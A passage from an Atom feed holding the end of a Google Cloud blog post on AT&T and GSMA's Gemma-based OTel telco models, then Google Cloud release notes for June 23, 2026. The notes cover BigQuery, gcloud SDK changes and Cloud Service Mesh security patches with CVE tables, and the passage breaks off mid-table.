&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To address this challenge, the GSMA recently launched the &lt;/span&gt;&lt;a href="https://www.open-telco.ai/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Open Telco AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; platform to build accurate, efficient, and trusted telco-grade AI. As a core part of this collaborative effort, AT&amp;amp;T post-trained a family of open telco models, called &lt;/span&gt;&lt;a href="https://huggingface.co/farbodtavakkoli/models" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;OTel&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, on different architectures including &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemma-4-available-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google’s open-source Gemma models&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These models were trained on a specialized telco-specific dataset curated by GSMA and its collaborators, including telecom operators, network equipment providers, and academia. The initiative successfully delivered 30 models across a range of sizes and architectures, optimizing the balance between accuracy and efficiency.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Crucially, these models are built with safety at their core, being trained for abstention using &lt;/span&gt;&lt;a href="https://cloud.google.com/use-cases/retrieval-augmented-generation"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;retrieval augmented generation (RAG)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to drastically reduce hallucinations — an absolute necessity in highly regulated telecom environments that are so central to modern life.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“The Open Telco AI platform represents a critical milestone in establishing trusted, domain-specific intelligence for the telecommunications industry,” said Louis Powell, director for AI technologies at GSMA. “By leveraging open-source foundations like Gemma, we are proving that highly accurate, efficient, and reproducible models can be built through global industry collaboration.”&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemma emerges as a leading model&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AT&amp;amp;T’s tests during OTel development highlight the strength of Gemma compared to other architectures, demonstrating strong performance gains across the entire OTel model family after telecom-specific fine-tuning. Notably: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;gemma-4-E4B-it&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; model returned correct response 91.74% of the time, achieving the highest overall accuracy for all models tested.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This baseline version of Gemma 3 with 27-billion parameters delivered the strongest performance in initial model training across the models tested by AT&amp;amp;T.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Gemma 3 model with 300-million telco-related &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/meet-ais-multitool-vector-embeddings?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;embeddings&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; saw a significant retrieval improvement.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"Gemma models have increasingly been setting the standard for open-source fine-tuning," said Mark Austin, VP of data science and AI at AT&amp;amp;T. "By training these models specifically on telco data, we'll be able to outperform legacy models several times its size in certain telco scenarios. This can help increase accuracy while driving down costs at the same time."&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Empowering the future with Google Cloud's full-stack solutions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The impact of this open collaboration has been immediate, with over 18 million downloads of the models to date. Today, OTel stands as one of the top models on the &lt;/span&gt;&lt;a href="https://www.open-telco.ai/benchmarks/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Open Telco Benchmarks&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, demonstrating that tailored, smaller models can outperform massive frontier models when optimized for specific domains.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Looking ahead, Google Cloud is committed to supporting telecom operators globally in developing and deploying their own custom telco AI models. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By providing a comprehensive, full-stack solution — including robust AI-optimized infrastructure, AI development tools, and open models like Gemma — we can help operators, vendors, and innovators fine-tune these models further with their own data. This enables telecom operators to accelerate their journey in AI adoption while deploying telco-grade AI safely using Gemma’s built-in support and guardrails.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Together, the telecom industry can replicate the incredible progress seen in coding and reasoning, bringing those advanced capabilities into critical telecom sub-domains such as automated network configuration and self-healing systems.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/telecommunications/open-models-global-networks-how-att-and-gsma-are-accelerating-innovation-with-gemma/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-23T12:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_23_2026</id>
    <title>Cloud Release Notes — June 23, 2026</title>
    <updated>2026-06-23T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;AI Hypercomputer&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Preview&lt;/strong&gt;: You can use Gemini in the Google Cloud console as
an AI-powered interface to evaluate hardware options, estimate deployment costs,
and view recommended configurations for your clusters. Prompting
Gemini helps you reach an optimal configuration for your cluster
before you create or modify the cluster. For more information, see
&lt;a href="https://docs.cloud.google.com/ai-hypercomputer/docs/design-with-gemini"&gt;Design and optimize your cluster with Gemini&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Backup and DR&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can now configure application-consistent backups for Compute Engine
instances directly through the Google Cloud Console. This enhancement
allows you to enable Guest Flush or VSS options within Backup Plans,
ensuring data integrity for applications running on Linux or Windows
VMs during the backup process. The &lt;a href="https://docs.cloud.google.com/backup-disaster-recovery/docs/cloud-console/compute/compute-instance-backup"&gt;Back up Compute Engine instances&lt;/a&gt; documentation has been updated with instructions on how to create and modify
backup plans to use this feature. &lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Announcing the general availability (GA) of cross-region backups for
Backup and DR Service. Customers can now protect Compute Engine instances,
Compute Engine disks, and Filestore instances against regional
outages by storing backups in a distinct secondary region of their choice.
This functionality enhances disaster recovery capabilities, provides a
cost-effective way to ensure regional resilience, and helps maintain
strict control over data residency. To learn more, see
&lt;a href="https://docs.cloud.google.com/backup-disaster-recovery/docs/concepts/backup-vault#regions"&gt;Backup vaults for immutable and indelible backups&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can now configure your BigQuery pipelines to automatically trigger
executions based on updates to specific BigQuery tables. For more information,
see &lt;a href="https://docs.cloud.google.com/bigquery/docs/schedule-pipelines#trigger-based-scheduling"&gt;Trigger-based
scheduling&lt;/a&gt;. This feature is in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/conversational-analytics"&gt;Conversational analytics&lt;/a&gt; in BigQuery
is now &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available&lt;/a&gt;
(GA) and includes the following features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You can select whether an agent can only use generally available models, or
a mix of preview and generally available models.&lt;/li&gt;
&lt;li&gt;You can change the thinking mode of an agent within a conversation.&lt;/li&gt;
&lt;li&gt;Agents can ask clarifying questions about your input prompt.&lt;/li&gt;
&lt;li&gt;Agent responses include context citations, to help you understand the specific 
sources used to generate the answer.&lt;/li&gt;
&lt;li&gt;Parameters are supported in verified queries.&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Agents can use the following AI functions to answer your questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-key-drivers"&gt;&lt;code&gt;AI.KEY_DRIVERS&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-if"&gt;&lt;code&gt;AI.IF&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-score"&gt;&lt;code&gt;AI.SCORE&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-classify"&gt;&lt;code&gt;AI.CLASSIFY&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-similarity"&gt;&lt;code&gt;AI.SIMILARITY&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-search"&gt;&lt;code&gt;AI.SEARCH&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Conversational analytics supports US MREP and EU MREP
&lt;a href="https://docs.cloud.google.com/bigquery/docs/conversational-analytics#locations"&gt;locations&lt;/a&gt; that govern
the storage of agent and conversation resources, and the location used for
ML processing.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can also create a
&lt;a href="https://docs.cloud.google.com/bigquery/docs/create-conversations#datasets"&gt;conversation with a dataset&lt;/a&gt;.
This feature is in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;preview&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Database Migration Service&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Database Migration Service for MySQL homogeneous migrations now supports MySQL version 9.7.
For more information, see
&lt;a href="https://docs.cloud.google.com/database-migration/docs/supported-databases"&gt;
Supported source and destination databases&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud SDK&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h2 id="57400_2026-06-23"&gt;574.0.0 (2026-06-23)&lt;/h2&gt;
&lt;h3 id="ai_platform"&gt;AI Platform&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;gcloud beta ai semantic-governance-policy-engine deprovision&lt;/code&gt;
command to tear down a semantic governance policy engine, including its
tenant project, GKE cluster, and PSC service attachments.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="agent_identity"&gt;Agent Identity&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;gcloud beta agent-identity auth-providers get-iam-policy|set-iam-policy|add-iam-policy-binding|remove-iam-policy-binding|test-iam-permissions&lt;/code&gt; commands.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="agent_registry"&gt;Agent Registry&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;gcloud agent-registry&lt;/code&gt; command group to manage Agent Registry resources.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="backup_for_gke"&gt;Backup For GKE&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Made &lt;code&gt;gcloud container backup-restore&lt;/code&gt; command groups compatible with non-default universe domains.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="bigquery"&gt;BigQuery&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Fixed a bug where &lt;code&gt;stderr&lt;/code&gt; messages from &lt;code&gt;gcloud&lt;/code&gt; CLI output would be printed to &lt;code&gt;stdout&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;--gcloud_config_cache&lt;/code&gt; flag to enable caching data retrieved from the &lt;code&gt;gcloud&lt;/code&gt; CLI.&lt;/li&gt;
&lt;li&gt;Added display of container request concurrency of BigQuery Python UDF in &lt;code&gt;bq show --routine&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Added information about AI Agent in the execution environment to the user-agent HTTP header in the API request.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_datastream"&gt;Cloud Datastream&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added Regional Endpoints (REP) support for all Datastream commands.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cloud_memorystore"&gt;Cloud Memorystore&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;--zone-distribution-config-zones&lt;/code&gt; flag to &lt;code&gt;gcloud memorystore instances create&lt;/code&gt; command. This flag lets users specify multiple zones when they create a &lt;code&gt;MULTI_ZONE&lt;/code&gt; cluster.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;--zone-distribution-config-zones&lt;/code&gt; flag to &lt;code&gt;gcloud redis clusters create&lt;/code&gt; command. This flag lets users specify multiple zones when they create a &lt;code&gt;MULTI_ZONE&lt;/code&gt; cluster.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cluster_director"&gt;Cluster Director&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added support for creating clusters using &lt;code&gt;--quickstart-cluster&lt;/code&gt; in &lt;code&gt;gcloud beta cluster-director clusters create&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="colab"&gt;Colab&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added Hyperdisk options to &lt;code&gt;--disk-type&lt;/code&gt; of &lt;code&gt;gcloud colab runtime-templates create&lt;/code&gt;: &lt;code&gt;HYPERDISK_BALANCED&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="compute_engine"&gt;Compute Engine&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Fixed an issue where &lt;code&gt;gcloud compute url-maps import&lt;/code&gt; reset custom &lt;code&gt;timeout&lt;/code&gt; and &lt;code&gt;retryPolicy&lt;/code&gt; (specifically &lt;code&gt;numRetries&lt;/code&gt;) values to defaults when updating an existing URL map.&lt;/li&gt;
&lt;li&gt;Added &lt;code&gt;--vsock-mode&lt;/code&gt; flag to &lt;code&gt;gcloud compute instances create&lt;/code&gt;,
&lt;code&gt;gcloud compute instance-templates create&lt;/code&gt;, &lt;code&gt;gcloud compute instances bulk
create&lt;/code&gt;, and &lt;code&gt;gcloud compute queued-resources create&lt;/code&gt; in ALPHA to support
enabling/disabling VSOCK mode.&lt;/li&gt;
&lt;li&gt;Promoted &lt;code&gt;--purpose&lt;/code&gt; flag to &lt;code&gt;gcloud compute public-delegated-prefixes create&lt;/code&gt; in beta.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="database_migration"&gt;Database Migration&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Added Regional Endpoints (REP) support for all Database Migration Service (DMS) commands.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="kubernetes_engine"&gt;Kubernetes Engine&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Updated default kubectl from 1.35.3 to 1.35.6.&lt;/li&gt;
&lt;li&gt;Added new kubectl version 1.36.2 for the RAPID channel.&lt;/li&gt;
&lt;li&gt;Additional kubectl versions:
&lt;ul&gt;
&lt;li&gt;kubectl.1.30 (1.30.14)&lt;/li&gt;
&lt;li&gt;kubectl.1.31 (1.31.14)&lt;/li&gt;
&lt;li&gt;kubectl.1.32 (1.32.13)&lt;/li&gt;
&lt;li&gt;kubectl.1.33 (1.33.13)&lt;/li&gt;
&lt;li&gt;kubectl.1.34 (1.34.9)&lt;/li&gt;
&lt;li&gt;kubectl.1.35 (1.35.6)&lt;/li&gt;
&lt;li&gt;kubectl.1.36 (1.36.2)&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="network_security"&gt;Network Security&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Promoted &lt;code&gt;gcloud network-security ull-mirroring-engines&lt;/code&gt; and &lt;code&gt;gcloud network-security ull-mirroring-collectors&lt;/code&gt; commands to beta.&lt;/li&gt;
&lt;li&gt;Promoted &lt;code&gt;gcloud network-security ull-mirroring-engines&lt;/code&gt; and &lt;code&gt;gcloud network-security ull-mirroring-collectors&lt;/code&gt; commands to GA.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Subscribe to these release notes at &lt;a href="https://groups.google.com/forum/#!forum/google-cloud-sdk-announce"&gt;https://groups.google.com/forum/#!forum/google-cloud-sdk-announce&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Service Mesh&lt;/h2&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;1.29.5-asm.3 is now available for in-cluster Cloud Service Mesh.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This patch release contains the fix for the security vulnerability listed in
&lt;a href="https://docs.cloud.google.com/service-mesh/docs/security-bulletins#gcp-2026-040"&gt;GCP-2026-040&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For details on upgrading Cloud Service Mesh, see
&lt;a href="https://docs.cloud.google.com/service-mesh/docs/upgrade/upgrade"&gt;Upgrade Cloud Service Mesh&lt;/a&gt;. Cloud Service
Mesh 1.29.5-asm.3 uses Envoy v1.37.5-dev.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;This patch release also contain the fixes for the following CVEs:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left;"&gt;CVE&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Proxy&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Control Plane&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Distroless&lt;/th&gt;
&lt;th style="text-align: left;"&gt;CNI&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Severity&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-34182&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Medium (9.1)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-45447&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;High (8.8)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-7383&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (8.1)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-34180&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (7.5)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-45445&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Medium (7.5)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-9076&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (7.5)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-42766&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (5.9)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-42767&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (5.9)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-34743&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (5.3)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-45446&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (4.8)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-42770&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (3.7)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-40226&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Medium (0.0)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;1.28.9-asm.2 is now available for in-cluster Cloud Service Mesh.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This patch release contains the fix for the security vulnerability listed in
&lt;a href="https://docs.cloud.google.com/service-mesh/docs/security-bulletins#gcp-2026-040"&gt;GCP-2026-040&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For details on upgrading Cloud Service Mesh, see
&lt;a href="https://docs.cloud.google.com/service-mesh/v1.28/docs/upgrade/upgrade"&gt;Upgrade Cloud Service Mesh&lt;/a&gt;. Cloud Service
Mesh 1.28.9-asm.2 uses Envoy v1.36.9-dev.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;This patch release also contain the fixes for the following CVEs:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left;"&gt;CVE&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Proxy&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Control Plane&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Distroless&lt;/th&gt;
&lt;th style="text-align: left;"&gt;CNI&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Severity&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-34182&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Medium (9.1)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-45447&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;High (8.8)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-7383&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (8.1)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-34180&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (7.5)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-45445&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Medium (7.5)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-9076&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (7.5)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-42766&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (5.9)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-42767&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
